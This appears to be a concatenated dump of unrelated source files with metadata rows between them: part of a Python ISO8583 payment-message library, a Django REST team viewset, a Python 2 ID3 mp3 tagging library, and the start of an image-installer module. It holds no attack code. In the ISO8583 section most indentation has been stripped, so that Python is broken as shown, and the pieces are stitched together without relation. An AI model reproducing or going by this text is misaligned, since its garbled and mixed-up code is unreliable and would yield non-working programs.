bits.append((c + 1) * 8)
self.BITMAP_VALUES[(c + 1) * 8] = 'X'
else:
if (c == 0) & (d == 2): # Continuation bit
if self.DEBUG == True:
print('Bit 1 is present !!!')
bits.append(1)
else:
if self.DEBUG == True:
print('Bit %s is present !!!' % (c * 8 + d - 1))
bits.append(c * 8 + d - 1)
self.BITMAP_VALUES[c * 8 + d - 1] = 'X'
bits.sort()
return bits
################################################################################################
################################################################################################
# return a array of bits, when processing the bitmap
def __getBitsFromBitmap(self):
"""Method that process the bitmap and return a array with the bits presents inside it.
It's a internal method, so don't call!
"""
bits = []
for c in range(0, 16):
for d in range(1, 9):
if self.DEBUG == True:
print('Value (%d)-> %s & %s = %s' % (
d, self.BITMAP[c], self._TMP[d], (self.BITMAP[c] & self._TMP[d])))
if (self.BITMAP[c] & self._TMP[d]) == self._TMP[d]:
                    if d == 1:  # it is the 8th bit
if self.DEBUG == True:
print('Bit %s is present !!!' % ((c + 1) * 8))
bits.append((c + 1) * 8)
else:
if (c == 0) & (d == 2): # Continuation bit
if self.DEBUG == True:
print('Bit 1 is present !!!')
bits.append(1)
else:
if self.DEBUG == True:
print('Bit %s is present !!!' % (c * 8 + d - 1))
bits.append(c * 8 + d - 1)
bits.sort()
return bits
################################################################################################
################################################################################################
# Set of type LL
def __setBitTypeLL(self, bit, value):
"""Method that set a bit with value in form LL
It put the size in front of the value
Example: pack.setBit(99,'123') -> Bit 99 is a LL type, so this bit, in ASCII form need to be 03123. To understand, 03 is the size of the information and 123 is the information/value
@param: bit -> bit to be setted
@param: value -> value to be setted
@raise: ValueToLarge Exception
It's a internal method, so don't call!
"""
value = "%s" % value
if len(value) > 99:
# value = value[0:99]
raise ValueToLarge('Error: value up to size! Bit[%s] of type %s limit size = %s' % (
bit, self.getBitType(bit), self.getBitLimit(bit)))
if len(value) > self.getBitLimit(bit):
raise ValueToLarge('Error: value up to size! Bit[%s] of type %s limit size = %s' % (
bit, self.getBitType(bit), self.getBitLimit(bit)))
size = "%s" % len(value)
self.BITMAP_VALUES[bit] = "%s%s" % (size.zfill(2), value)
################################################################################################
################################################################################################
# Set of type LLL
def __setBitTypeLLL(self, bit, value):
"""Method that set a bit with value in form LLL
It put the size in front of the value
Example: pack.setBit(104,'12345ABCD67890') -> Bit 104 is a LLL type, so this bit, in ASCII form need to be 01412345ABCD67890.
To understand, 014 is the size of the information and 12345ABCD67890 is the information/value
@param: bit -> bit to be setted
@param: value -> value to be setted
@raise: ValueToLarge Exception
It's a internal method, so don't call!
"""
value = "%s" % value
if len(value) > 999:
raise ValueToLarge('Error: value up to size! Bit[%s] of type %s limit size = %s' % (
bit, self.getBitType(bit), self.getBitLimit(bit)))
if len(value) > self.getBitLimit(bit):
raise ValueToLarge('Error: value up to size! Bit[%s] of type %s limit size = %s' % (
bit, self.getBitType(bit), self.getBitLimit(bit)))
size = "%s" % len(value)
self.BITMAP_VALUES[bit] = "%s%s" % (size.zfill(3), value)
################################################################################################
################################################################################################
# Set of type N,
def __setBitTypeN(self, bit, value):
"""Method that set a bit with value in form N
It complete the size of the bit with a default value
Example: pack.setBit(3,'30000') -> Bit 3 is a N type, so this bit, in ASCII form need to has size = 6 (ISO especification) so the value 30000 size = 5 need to receive more "1" number.
In this case, will be "0" in the left. In the package, the bit will be sent like '030000'
@param: bit -> bit to be setted
@param: value -> value to be setted
@raise: ValueToLarge Exception
It's a internal method, so don't call!
"""
value = "%s" % value
if len(value) > self.getBitLimit(bit):
value = value[0:self.getBitLimit(bit)]
raise ValueToLarge('Error: value up to size! Bit[%s] of type %s limit size = %s' % (
bit, self.getBitType(bit), self.getBitLimit(bit)))
self.BITMAP_VALUES[bit] = value.zfill(self.getBitLimit(bit))
################################################################################################
################################################################################################
# Set of type A
def __setBitTypeA(self, bit, value):
"""Method that set a bit with value in form A
It complete the size of the bit with a default value
Example: pack.setBit(3,'30000') -> Bit 3 is a A type, so this bit, in ASCII form need to has size = 6 (ISO especification) so the value 30000 size = 5 need to receive more "1" number.
In this case, will be "0" in the left. In the package, the bit will be sent like '030000'
@param: bit -> bit to be setted
@param: value -> value to be setted
@raise: ValueToLarge Exception
It's a internal method, so don't call!
"""
value = "%s" % value
if len(value) > self.getBitLimit(bit):
value = value[0:self.getBitLimit(bit)]
raise ValueToLarge('Error: value up to size! Bit[%s] of type %s limit size = %s' % (
bit, self.getBitType(bit), self.getBitLimit(bit)))
self.BITMAP_VALUES[bit] = value.zfill(self.getBitLimit(bit))
################################################################################################
################################################################################################
# Set of type B
def __setBitTypeB(self, bit, value):
"""Method that set a bit with value in form B
It complete the size of the bit with a default value
Example: pack.setBit(3,'30000') -> Bit 3 is a B type, so this bit, in ASCII form need to has size = 6 (ISO especification) so the value 30000 size = 5 need to receive more "1" number.
In this case, will be "0" in the left. In the package, the bit will be sent like '030000'
@param: bit -> bit to be setted
@param: value -> value to be setted
@raise: ValueToLarge Exception
It's a internal method, so don't call!
"""
value = "%s" % value
if len(value) > self.getBitLimit(bit):
value = value[0:self.getBitLimit(bit)]
raise ValueToLarge('Error: value up to size! Bit[%s] of type %s limit size = %s' % (
bit, self.getBitType(bit), self.getBitLimit(bit)))
self.BITMAP_VALUES[bit] = value.zfill(self.getBitLimit(bit))
################################################################################################
################################################################################################
# Set of type ANS
def __setBitTypeANS(self, bit, value):
"""Method that set a bit with value in form ANS
It complete the size of the bit with a default value
Example: pack.setBit(3,'30000') -> Bit 3 is a ANS type, so this bit, in ASCII form need to has size = 6 (ISO especification) so the value 30000 size = 5 need to receive more "1" number.
In this case, will be "0" in the left. In the package, the bit will be sent like '030000'
@param: bit -> bit to be setted
@param: value -> value to be setted
@raise: ValueToLarge Exception
It's a internal method, so don't call!
"""
value = "%s" % value
if len(value) > self.getBitLimit(bit):
value = value[0:self.getBitLimit(bit)]
raise ValueToLarge('Error: value up to size! Bit[%s] of type %s limit size = %s' % (
bit, self.getBitType(bit), self.getBitLimit(bit)))
self.BITMAP_VALUES[bit] = value.zfill(self.getBitLimit(bit))
################################################################################################
################################################################################################
    # print the bits inside the iso
def showIsoBits(self):
"""Method that show in detail a list of bits , values and types inside the object
Example: output to
(...)
iso.setBit(2,2)
iso.setBit(4,4)
(...)
iso.showIsoBits()
(...)
Bit[2] of type LL has limit 19 = 012
Bit[4] of type N has limit 12 = 000000000004
(...)
"""
for cont in range(0, 129):
if self.BITMAP_VALUES[cont] != self._BIT_DEFAULT_VALUE:
print("Bit[%s] of type %s has limit %s = %s" % (
cont, self.getBitType(cont), self.getBitLimit(cont), self.BITMAP_VALUES[cont]))
################################################################################################
################################################################################################
# print Raw iso
def showRawIso(self):
"""Method that print ISO8583 ASCII complete representation
Example:
iso = ISO8583()
iso.setMTI('0800')
iso.setBit(2,2)
iso.setBit(4,4)
iso.setBit(12,12)
iso.setBit(17,17)
iso.setBit(99,99)
iso.showRawIso()
output (print) -> 0800d010800000000000000000002000000001200000000000400001200170299
Hint: Try to use getRawIso method and format your own print :)
"""
resp = self.getRawIso()
print(resp)
################################################################################################
################################################################################################
# Return raw iso
def getRawIso(self):
"""Method that return ISO8583 ASCII complete representation
Example:
iso = ISO8583()
iso.setMTI('0800')
iso.setBit(2,2)
iso.setBit(4,4)
iso.setBit(12,12)
iso.setBit(17,17)
iso.setBit(99,99)
str = iso.getRawIso()
print ('This is the ASCII package %s' % str)
output (print) -> This is the ASCII package 0800d010800000000000000000002000000001200000000000400001200170299
@return: str with complete ASCII ISO8583
@raise: InvalidMTI Exception
"""
self.__buildBitmap()
        if self.MESSAGE_TYPE_INDICATION == '':
            raise InvalidMTI('Check MTI! Did you set it?')
        resp = ""
resp += self.MESSAGE_TYPE_INDICATION
resp += self.BITMAP_HEX
for cont in range(0, 129):
if self.BITMAP_VALUES[cont] != self._BIT_DEFAULT_VALUE:
resp = "%s%s" % (resp, self.BITMAP_VALUES[cont])
return resp
################################################################################################
################################################################################################
# Redefine a bit
def redefineBit(self, bit, smallStr, largeStr, bitType, size, valueType):
"""Method that redefine a bit structure in global scope!
Can be used to personalize ISO8583 structure to another specification (ISO8583 1987 for example!)
Hint: If you have a lot of "ValueToLarge Exception" maybe the especification that you are using is different of mine. So you will need to use this method :)
@param: bit -> bit to be redefined
@param: smallStr -> a small String representantion of the bit, used to build "user friendly prints", example "2" for bit 2
@param: largeStr -> a large String representantion of the bit, used to build "user friendly prints" and to be used to inform the "main use of the bit",
example "Primary account number (PAN)" for bit 2
@param: bitType -> type the bit, used to build the values, example "LL" for bit 2. Need to be one of (B, N, AN, ANS, LL, LLL)
@param: size -> limit size the bit, used to build/complete the values, example "19" for bit 2.
@param: valueType -> value type the bit, used to "validate" the values, example "n" for bit 2. This mean that in bit 2 we need to have only numeric values.
Need to be one of (a, an, n, ansb, b)
@raise: BitInexistent Exception, InvalidValueType Exception
"""
if self.DEBUG == True:
print('Trying to redefine the bit with (self,%s,%s,%s,%s,%s,%s)' % (
bit, smallStr, largeStr, bitType, size, valueType))
# validating bit position
        if bit == 1 or bit == 64 or bit < 1 or bit > 128:
            raise BitInexistent("Error: bit %d cannot be changed because it has an invalid number!" % bit)
# need to validate if the type and size is compatible! example slimit = 100 and type = LL
if bitType == "B" or bitType == "N" or bitType == "AN" or bitType == "ANS" or bitType == "LL" or bitType == "LLL":
if valueType == "a" or valueType == "n" or valueType == "ansb" or valueType == "ans" or valueType == "b" or valueType == "an":
self._BITS_VALUE_TYPE[bit] = [smallStr, largeStr, bitType, size, valueType]
if self.DEBUG == True:
print('Bit %d redefined!' % bit)
else:
                raise InvalidValueType(
                    "Error: bit %d cannot be changed because %s is not a valid valueType (a, an, n, ansb, b)!" % (
                        bit, valueType))
# return
else:
            raise InvalidBitType(
                "Error: bit %d cannot be changed because %s is not a valid bitType (B, N, AN, ANS, LL, LLL)!" % (
                    bit, bitType))
# return
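        # Illustrative sketch (not from the original code): make bit 42 a fixed-size
        # numeric field while keeping its original names and limit:
        #   iso.redefineBit(42, '42', iso.getLargeBitName(42), 'N',
        #                   iso.getBitLimit(42), iso.getBitValueType(42))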
################################################################################################
################################################################################################
    # from a string stream, get the MTI
def __setMTIFromStr(self, iso):
"""Method that get the first 4 characters to be the MTI.
It's a internal method, so don't call!
"""
self.MESSAGE_TYPE_INDICATION = iso[0:4]
if self.DEBUG == True:
print('MTI found was %s' % self.MESSAGE_TYPE_INDICATION)
################################################################################################
################################################################################################
# return the MTI
def getMTI(self):
"""Method that return the MTI of the package
@return: str -> with the MTI
"""
# Need to validate if the MTI was setted ...etc ...
return self.MESSAGE_TYPE_INDICATION
################################################################################################
################################################################################################
# Return the bitmap
def getBitmap(self):
"""Method that return the ASCII Bitmap of the package
@return: str -> with the ASCII Bitmap
"""
if self.BITMAP_HEX == '':
self.__buildBitmap()
return self.BITMAP_HEX
################################################################################################
################################################################################################
    # return the array of values
    def getValuesArray(self):
        """Method that returns the internal array of the package
        @return: array -> with all bits, present or not in the bitmap
"""
return self.BITMAP_VALUES
################################################################################################
################################################################################################
# Receive a str and interpret it to bits and values
def __getBitFromStr(self, strWithoutMtiBitmap):
"""Method that receive a string (ASCII) without MTI and Bitmaps (first and second), understand it and remove the bits values
@param: str -> with all bits presents whithout MTI and bitmap
It's a internal method, so don't call!
"""
if self.DEBUG == True:
print('This is the input string <%s>' % strWithoutMtiBitmap)
        offset = 0
        # skip bit 1 because it was already defined in "__inicializeBitsFromBitmapStr"
for cont in range(2, 129):
if self.BITMAP_VALUES[cont] != self._BIT_DEFAULT_VALUE:
if self.DEBUG == True:
print('String = %s offset = %s bit = %s' % (strWithoutMtiBitmap[offset:], offset, cont))
if self.getBitType(cont) == 'LL':
valueSize = int(strWithoutMtiBitmap[offset:offset + 2])
if self.DEBUG == True:
print('Size of the message in LL = %s' % valueSize)
if valueSize > self.getBitLimit(cont):
                        print('This bit is larger than the specification.')
# raise ValueToLarge("This bit is larger than the especification!")
self.BITMAP_VALUES[cont] = strWithoutMtiBitmap[offset:offset + 2] + strWithoutMtiBitmap[
offset + 2:offset + 2 + valueSize]
if self.DEBUG == True:
print('\tSetting bit %s value %s' % (cont, self.BITMAP_VALUES[cont]))
# fix for AppZone - their responses don't comply with specifications
if cont == 33:
offset += valueSize + 2 # replace with 17 if it fails
else:
offset += valueSize + 2
if self.getBitType(cont) == 'LLL':
valueSize = int(strWithoutMtiBitmap[offset:offset + 3])
if self.DEBUG == True:
print('Size of the message in LLL = %s' % valueSize)
if valueSize > self.getBitLimit(cont):
raise ValueToLarge("This bit is larger than the especification!")
self.BITMAP_VALUES[cont] = strWithoutMtiBitmap[offset:offset + 3] + strWithoutMtiBitmap[
offset + 3:offset + 3 + valueSize]
if self.DEBUG == True:
print('\tSetting bit %s value %s' % (cont, self.BITMAP_VALUES[cont]))
offset += valueSize + 3
# if self.getBitType(cont) == 'LLLL':
# valueSize = int(strWithoutMtiBitmap[offset:offset +4])
# if valueSize > self.getBitLimit(cont):
# raise ValueToLarge("This bit is larger than the especification!")
# self.BITMAP_VALUES[cont] = '(' + strWithoutMtiBitmap[offset:offset+4] + ')' + strWithoutMtiBitmap[offset+4:offset+4+valueSize]
# offset += valueSize + 4
if self.getBitType(cont) == 'N' or self.getBitType(cont) == 'A' or self.getBitType(
cont) == 'ANS' or self.getBitType(cont) == 'B' or self.getBitType(cont) == 'AN':
self.BITMAP_VALUES[cont] = strWithoutMtiBitmap[offset:self.getBitLimit(cont) + offset]
if self.DEBUG == True:
print('\tSetting bit %s value %s' % (cont, self.BITMAP_VALUES[cont]))
offset += self.getBitLimit(cont)
################################################################################################
################################################################################################
# Parse a ASCII iso to object
def setIsoContent(self, iso):
"""Method that receive a complete ISO8583 string (ASCII) understand it and remove the bits values
Example:
iso = '0210B238000102C080040000000000000002100000000000001700010814465469421614465701081100301000000N399915444303500019991544986020 Value not allowed009000095492'
i2 = ISO8583()
# in this case, we need to redefine a bit because default bit 42 is LL and in this especification is "N"
# the rest remain, so we use "get" :)
i2.redefineBit(42, '42', i2.getLargeBitName(42), 'N', i2.getBitLimit(42), i2.getBitValueType(42) )
        i2.setIsoContent(iso)
print ('Bitmap = %s' %i2.getBitmap())
print ('MTI = %s' %i2.getMTI() )
print ('This ISO has bits:')
v3 = i2.getBitsAndValues()
for v in v3:
print ('Bit %s of type %s with value = %s' % (v['bit'],v['type'],v['value']))
@param: str -> complete ISO8583 string
@raise: InvalidIso8583 Exception
"""
if len(iso) < 20:
raise InvalidIso8583('This is not a valid iso!!')
if self.DEBUG == True:
print('ASCII to process <%s>' % iso)
self.__setMTIFromStr(iso)
isoT = iso[4:]
self.__getBitmapFromStr(isoT)
self.__inicializeBitsFromBitmapStr(self.BITMAP_HEX)
if self.DEBUG == True:
print('This is the array of bits (before) %s ' % self.BITMAP_VALUES)
self.__getBitFromStr(iso[4 + len(self.BITMAP_HEX):])
if self.DEBUG == True:
print('This is the array of bits (after) %s ' % self.BITMAP_VALUES)
################################################################################################
################################################################################################
# Method that compare 2 isos
def __cmp__(self, obj2):
"""Method that compare two objects in "==", "!=" and other things
Example:
p1 = ISO8583()
p1.setMTI('0800')
p1.setBit(2,2)
p1.setBit(4,4)
p1.setBit(12,12)
p1.setBit(17,17)
p1.setBit(99,99)
#get the rawIso and save in the iso variable
iso = p1.getRawIso()
p2 = ISO8583()
p2.setIsoContent(iso)
print ('Is equivalent?')
        if p1 == p2:
print ('Yes :)')
else:
print ('Noooooooooo :(')
@param: obj2 -> object that will be compared
        @return: <0 if not equal, 0 if equal
"""
ret = -1 # By default is different
if (self.getMTI() == obj2.getMTI()) and (self.getBitmap() == obj2.getBitmap()) and (
self.getValuesArray() == obj2.getValuesArray()):
ret = 0
return ret
################################################################################################
################################################################################################
    # Method that returns an array with bits and values inside the iso package
def getBitsAndValues(self):
"""Method that return an array of bits, values, types etc.
Each array value is a dictionary with: {'bit':X ,'type': Y, 'value': Z} Where:
bit: is the bit number
type: is the bit type
value: is the bit value inside this object
so the Generic array returned is: [ (...),{'bit':X,'type': Y, 'value': Z}, (...)]
Example:
p1 = ISO8583()
p1.setMTI('0800')
p1.setBit(2,2)
p1.setBit(4,4)
p1.setBit(12,12)
p1.setBit(17,17)
p1.setBit(99,99)
v1 = p1.getBitsAndValues()
for v in v1:
print ('Bit %s of type %s with value = %s' % (v['bit'],v['type'],v['value']))
@return: array of values.
"""
ret = []
for cont in range(2, 129):
if self.BITMAP_VALUES[cont] != self._BIT_DEFAULT_VALUE:
_TMP = {}
_TMP['bit'] = "%d" % cont
_TMP['type'] = self.getBitType(cont)
_TMP['value'] = self.BITMAP_VALUES[cont]
ret.append(_TMP)
return ret
################################################################################################
################################################################################################
    # Method that returns the value of a single bit inside the iso package
def getBit(self, bit):
"""Return the value of the bit
@param: bit -> the number of the bit that you want the value
@raise: BitInexistent Exception, BitNotSet Exception
"""
if bit < 1 or bit > 128:
raise BitInexistent("Bit number %s dosen't exist!" % bit)
# Is that bit set?
isThere = False
arr = self.__getBitsFromBitmap()
if self.DEBUG == True:
print('This is the array of bits inside the bitmap %s' % arr)
for v in arr:
if v == bit:
value = self.BITMAP_VALUES[bit]
isThere = True
break
if isThere:
return value
else:
raise BitNotSet("Bit number %s was not set!" % bit)
################################################################################################
################################################################################################
    # Method that returns ISO8583 in TCP/IP network form, with the size at the beginning.
def getNetworkISO(self, bigEndian=True):
"""Method that return ISO8583 ASCII package with the size in the beginning
By default, it return the package with size represented with big-endian.
Is the same that:
import struct
(...)
iso = ISO8583()
iso.setBit(3,'300000')
(...)
ascii = iso.getRawIso()
# Example: big-endian
# To little-endian, replace '!h' with '<h'
netIso = struct.pack('!h',len(iso))
netIso += ascii
# Example: big-endian
# To little-endian, replace 'iso.getNetworkISO()' with 'iso.getNetworkISO(False)'
print ('This <%s> the same that <%s>' % (iso.getNetworkISO(),netIso))
        @param: bigEndian (True|False) -> whether the size should be represented in big-endian.
@return: size + ASCII ISO8583 package ready to go to the network!
@raise: InvalidMTI Exception
"""
netIso = ""
asciiIso = self.getRawIso()
if bigEndian:
netIso = struct.pack('!h', len(asciiIso))
if self.DEBUG == True:
print('Pack Big-endian')
else:
netIso = struct.pack('<h', len(asciiIso))
if self.DEBUG == True:
print('Pack Little-endian')
netIso += asciiIso
return netIso
################################################################################################
################################################################################################
    # Method that receives an ISO8583 ASCII package in the network form and parses it.
    def setNetworkISO(self, iso, bigEndian=True):
        """Method that receives size + ASCII ISO8583 package and transforms it into the ISO8583 object.
        By default, it receives the package with the size represented in big-endian.
        It is the same as:
import struct
(...)
iso = ISO8583()
iso.setBit(3,'300000')
(...)
# Example: big-endian
# To little-endian, replace 'iso.getNetworkISO()' with 'iso.getNetworkISO(False)'
netIso = iso.getNetworkISO()
newIso = ISO8583()
# Example: big-endian
# To little-endian, replace 'newIso.setNetworkISO()' with 'newIso.setNetworkISO(False)'
newIso.setNetworkISO(netIso)
#Is the same that:
#size = netIso[0:2]
## To little-endian, replace '!h' with '<h'
#size = struct.unpack('!h',size )
#newIso.setIsoContent(netIso[2:size])
arr = newIso.getBitsAndValues()
for v in arr:
print ('Bit %s Type %s Value = %s' % (v['bit'],v['type'],v['value']))
@param: iso -> str that represents size + ASCII ISO8583 package
        @param: bigEndian (True|False) -> encoding of the size.
@raise: InvalidIso8583 Exception
"""
        if len(iso) < 24:
            raise InvalidIso8583('This is not a valid iso!! Invalid size')
size = iso[0:2]
if bigEndian:
size = struct.unpack('!h', size)
if self.DEBUG == True:
print('Unpack Big-endian')
else:
size = struct.unpack('<h', size)
if self.DEBUG == True:
print('Unpack Little-endian')
        if len(iso) != (size[0] + 2):
            raise InvalidIso8583(
                'This is not a valid iso!! The ISO8583 ASCII length (%s) does not match the declared size %s!' % (len(iso[2:]), size[0]))
self.setIsoContent(iso[2:])
################################################################################################
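# Illustrative round-trip sketch (not from the original code): build a package,
# serialize it with the network size header, then parse it back.
if __name__ == '__main__':
    p1 = ISO8583()
    p1.setMTI('0800')
    p1.setBit(2, 2)
    p1.setBit(4, 4)
    netIso = p1.getNetworkISO()
    p2 = ISO8583()
    p2.setNetworkISO(netIso)
    print('Round trip OK' if p1 == p2 else 'Round trip FAILED')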
|
gpl-3.0
| -8,084,716,628,131,540,000
| 45.057771
| 193
| 0.478809
| false
| 3.995553
| false
| false
| false
|
prattl/teamfinder
|
api/teams/api/views.py
|
1
|
6335
|
from common.api.permissions import IsStaffOrTeamCaptain
from common.models import Interest, Language, Position, TeamMember, Region
from teams.api.serializers import EditableFlatTeamSerializer, TeamSerializer, PlayerMembershipSerializer
from teams.models import Team
from rest_framework import permissions, status, viewsets
from rest_framework.decorators import detail_route
from rest_framework.response import Response
from .serializers import FlatTeamSerializer
class TeamViewSet(viewsets.ModelViewSet):
queryset = Team.objects.all()
serializer_class = TeamSerializer
model = Team
permission_classes = (IsStaffOrTeamCaptain, ) # TODO: Create IsStaffOrTeamCaptain permission for put/patch/delete
# TODO: Create IsStaffOrPlayer permission for post
@staticmethod
def setup_eager_loading(queryset):
queryset = queryset.select_related(
'captain',
'captain__user',
'creator',
'creator__user',
).prefetch_related(
'regions',
'available_positions',
'captain__regions',
'captain__positions',
'captain__teams',
'creator__regions',
'creator__positions',
'creator__teams',
'players__regions',
'teammember_set__player',
'teammember_set__player__user',
'teammember_set__player__regions',
'teammember_set__player__positions',
'teammember_set__player__teams',
)
return queryset
def get_serializer_class(self):
"""
If GET, HEAD, or OPTIONS return the nested serializer
If POST, PUT, PATCH, or DELETE return a flat serializer
Change the serializer based on permissions
* If method is safe, return TeamSerializer
* If user is the team captain, return EditableFlatTeamSerializer
* Else, return FlatTeamSerializer
"""
def _get_serializer_class():
if self.request.method in permissions.SAFE_METHODS:
return TeamSerializer
try:
instance = self.get_object()
except AssertionError:
pass
else:
if self.request.user == instance.captain.user:
return EditableFlatTeamSerializer
return FlatTeamSerializer
serializer_class = _get_serializer_class()
return serializer_class
def get_queryset_for_search(self, queryset):
keywords = self.request.query_params.get('keywords')
regions = self.request.query_params.getlist('regions[]')
available_positions = self.request.query_params.getlist('available_positions[]')
interests = self.request.query_params.getlist('interests[]')
languages = self.request.query_params.getlist('languages[]')
if keywords:
queryset = queryset.filter(name__icontains=keywords)
if regions:
queryset = queryset.filter(regions__in=Region.objects.filter(pk__in=regions))
if available_positions:
queryset = queryset.filter(available_positions__in=Position.objects.filter(pk__in=available_positions))
if interests:
queryset = queryset.filter(interests__in=Interest.objects.filter(pk__in=interests))
if languages:
queryset = queryset.filter(languages__in=Language.objects.filter(pk__in=languages))
return queryset.order_by('-search_score', '-updated', )
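        # Illustrative request (assumed client usage, not from this repo):
        #   GET /api/teams/?search=1&keywords=night&regions[]=3
        # filters by name substring and region, ordered by search_score, then
        # most recently updated.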
def get_queryset(self):
queryset = super().get_queryset()
queryset = self.setup_eager_loading(queryset)
search = self.request.query_params.get('search')
if search:
queryset = self.get_queryset_for_search(queryset)
return queryset
def create(self, request, *args, **kwargs):
data = request.data
# Validate with the flat serializer
serializer = FlatTeamSerializer(data=data, context={'request': request})
serializer.is_valid(raise_exception=True)
new_team = self.perform_create(serializer)
try:
player_position = Position.objects.get(pk=request.data.get('player_position'))
except Position.DoesNotExist:
player_position = None
TeamMember.objects.create(team=new_team, player=request.user.player, position=player_position)
headers = self.get_success_headers(serializer.data)
# Return a nested serializer
full_team = TeamSerializer(instance=new_team, context={'request': request})
return Response(full_team.data, status=status.HTTP_201_CREATED, headers=headers)
def perform_create(self, serializer):
return serializer.save(creator=self.request.user.player, captain=self.request.user.player)
def update(self, request, *args, **kwargs):
partial = kwargs.pop('partial', False)
instance = self.get_object()
serializer_class = self.get_serializer_class()
serializer = serializer_class(instance, data=request.data, partial=partial, context={'request': request})
serializer.is_valid(raise_exception=True)
updated_team = self.perform_update(serializer)
try:
# Try to update the requesting user's position within the team
player_position = Position.objects.get(pk=request.data.get('player_position'))
team_member = TeamMember.objects.get(team=updated_team, player=request.user.player)
if player_position != team_member.position:
team_member.position = player_position
team_member.save()
except (Position.DoesNotExist, TeamMember.DoesNotExist):
pass
full_team = TeamSerializer(instance=updated_team, context={'request': request})
return Response(full_team.data)
def perform_update(self, serializer):
return serializer.save()
@detail_route(permission_classes=(permissions.IsAuthenticated,), methods=('GET',))
def memberships(self, request, pk=None):
team = self.get_object()
serializer = PlayerMembershipSerializer(
team.teammember_set.all(), many=True, context={'request': request}
)
return Response(serializer.data, status=status.HTTP_200_OK)
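# Illustrative sketch (not from this repo): wiring the viewset with a DRF router,
# as would normally live in a urls module; the 'teams' prefix is an assumption.
from rest_framework.routers import DefaultRouter

router = DefaultRouter()
router.register(r'teams', TeamViewSet)
urlpatterns = router.urls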
|
apache-2.0
| 5,376,675,978,768,944,000
| 42.993056
| 119
| 0.64562
| false
| 4.496097
| false
| false
| false
|
eduble/SimpleFilesystems
|
taggerfs/id3library.py
|
1
|
2766
|
#!/usr/bin/env python
"""
This module implements a management library for your
collection of ID3-tagged mp3 files.
"""
import os
from os.path import join
from mutagen.easyid3 import EasyID3
class ID3Library:
"""Library of ID3-tagged mp3 files."""
def __init__(self):
"""Constructor."""
self._data = {}
    def getTag(self, mp3file):
        """Returns the ID3 tag of the given file, or an empty tag if the file has none."""
        try:
            tag = EasyID3(mp3file)
        except Exception:  # no valid ID3 tag, fall back to an empty one
            tag = EasyID3()
        return tag
def getTagElement(self, tag, elem):
"""Sub-routine to get one element of an ID3 tag (i.e. artist, album, ...)."""
value = None
if elem in tag:
value = tag[elem][0].encode('utf8').strip()
if value == '':
value = None
return value
def registerMP3File(self, path):
"""Registers the ID3 tag of a given mp3 file into the library."""
tag = self.getTag(path)
artist = self.getTagElement(tag,'artist')
album = self.getTagElement(tag,'album')
        if artist is None:
            artist = 'UnknownArtist'
        if album is None:
            album = 'UnknownAlbum'
if artist not in self._data:
self._data[artist] = {}
allAlbumsOfArtist = self._data[artist]
if album not in allAlbumsOfArtist:
allAlbumsOfArtist[album] = set({})
allTracksOfAlbum = allAlbumsOfArtist[album]
allTracksOfAlbum.add(path)
def registerMP3FilesFromDir(self, d):
"""Registers all files in a given directory (including files in sub-directories)."""
for dirname, dirnames, filenames in os.walk(d):
for filename in filenames:
if filename.endswith('.mp3'):
print 'adding file:', filename
path = join(dirname, filename)
self.registerMP3File(path)
def getArtists(self):
"""Outputs the list of artists the library knows about."""
return self._data.keys()
def getAlbums(self, artist):
"""Outputs the list of albums the library knows about for a given artist."""
return self._data[artist].keys()
def getFiles(self, artist, album):
"""Outputs the list of files the library knows about for a given album."""
return self._data[artist][album]
def registerArtist(self, artist):
"""Registers an artist into the library."""
self._data[artist] = {}
def registerAlbum(self, artist, album):
"""Registers an album into the library."""
self._data[artist][album] = set({})
def update(self, fullpath, old_artist, old_album,
new_artist, new_album):
"""
Updates the data (artist & album) about a given song.
In-memory and in-file (i.e. the ID3 tag) data will both be updated.
"""
# update current hierarchy
self._data[new_artist][new_album].add(fullpath)
self._data[old_artist][old_album].remove(fullpath)
# update ID3 tag
tag = self.getTag(fullpath)
tag['artist'] = new_artist
tag['album'] = new_album
tag.save(fullpath)
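# Illustrative usage sketch (not from the original module); the music directory
# path below is an assumption.
if __name__ == '__main__':
    lib = ID3Library()
    lib.registerMP3FilesFromDir('/tmp/music')
    for artist in lib.getArtists():
        for album in lib.getAlbums(artist):
            print '%s / %s -> %d file(s)' % (artist, album, len(lib.getFiles(artist, album)))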
|
lgpl-3.0
| -6,175,146,277,138,132,000
| 28.741935
| 86
| 0.665944
| false
| 3.281139
| false
| false
| false
|
HugoMMRabson/fonsa
|
src/my/installer/__init__.py
|
1
|
14952
|
#!/usr/bin/python3
"""
my.installer.__init__
# TESTING "PHASE ONE", ONE LINE AT A TIME...
import os
from willywonka_installer import *
from my.installer import *
args = Object()
args.skipalltools = True
args.platform = 'RaspberryPi3'
args.debugip = '192.168.251.112'
args.usegzip = True
args.outfile = '%s/testout.img' % WONKADIR
from my.v2and3 import connect_to_pydev_remote_debugger
connect_to_pydev_remote_debugger(args.debugip)
our_working_image = '%s/tmp/tmpfs/%s.wkg' % (WONKADIR, os.path.basename(args.outfile))
our_pristine_image = '%s/%s.pstn' % (WONKADIR, os.path.basename(args.outfile)) # TODO: %s/tmp/%s
our_golden_tarball = '%s/old/20180000_golden/%s.golden.tar.lzo' % (WONKADIR, args.platform)
for i in (our_working_image, our_pristine_image, our_golden_tarball):
os.system('mkdir -p %s' % os.path.dirname(i))
os.system('rm -f "%s"' % args.outfile)
if not os.path.exists(our_pristine_image):
obtain_decompressed_pristine_image(our_pristine_image, args.platform)
os.system('rm -f %s' % our_golden_tarball) # TEST PORPOISES
if not os.path.exists(our_golden_tarball) or 0 != os.system('find %s -mtime -%d 2>/dev/null' % (our_golden_tarball, DAYS_BEFORE_FORCING_REBUILD)):
from_a_pristine_image_generate_a_golden_tarball(pristine_image=our_pristine_image,
save_golden_tarball_here=our_golden_tarball,
skipalltools=args.skipalltools)
build_folder = '%s/mnt/src.%s' % (WONKADIR, args.platform)
print('Extracting golden tarball to our build folder => %s' % build_folder)
os.system('mkdir -p %s' % build_folder)
system_or_die('pv %s | lzop -d -c | tar -x -C %s' % (our_golden_tarball, build_folder))
if not args.skipalltools:
i_shall_call_willywonka_installer_phase_two(build_folder)
migrate_all_data_from_folder_to_resized_image(pristine_image=our_pristine_image,
src_folder=build_folder,
output_img_name=our_working_image,
use_gzip=args.usegzip,
silent=False)
"""
import datetime
import os
import sys
from my.globals.consts import RC_LOCAL_FNAME, FONSA_LOCKFILENAME, HOSTNAME_FNAME, PRODUCTION_MODEL, WONKADIR
from my.globals.exceptions import CannotFindSpareLoopdevError, WhatDoIDoWithThisPartitionError, ExternalCallBinaryError
